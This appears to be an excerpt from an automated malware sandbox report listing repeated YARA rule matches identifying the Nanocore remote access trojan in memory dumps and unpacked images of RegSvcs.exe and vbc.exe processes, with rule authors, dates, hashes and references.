Source: 00000005.00000002.2597464017.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597464017.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2360, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2360, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegSvcs.exe.600000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.600000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.500000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.500000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.590000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.590000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.2100000.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.2100000.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.2160000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.2160000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.7a0000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.7a0000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.590000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.590000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.7a0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.7a0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.26a6198.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.26a6198.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.790000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.790000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.389b840.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.389b840.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.780000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.780000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.820000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.820000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3940110.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3940110.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegSvcs.exe.220e8a4.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.220e8a4.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.610000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.610000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.3887649.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.3887649.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.820000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.820000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.5b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.5b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.520000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.520000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.26b23d8.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.26b23d8.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.780000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.780000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.790000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.790000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.389b840.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.389b840.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.600000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.600000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.520000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.520000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.3883020.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.3883020.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.2160000.16.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.2160000.16.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.2200000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.2200000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.2204c9f.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.2204c9f.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.2200000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.2200000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.3883020.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.3883020.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegSvcs.exe.2104629.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.2104629.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3940110.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3940110.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3940110.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
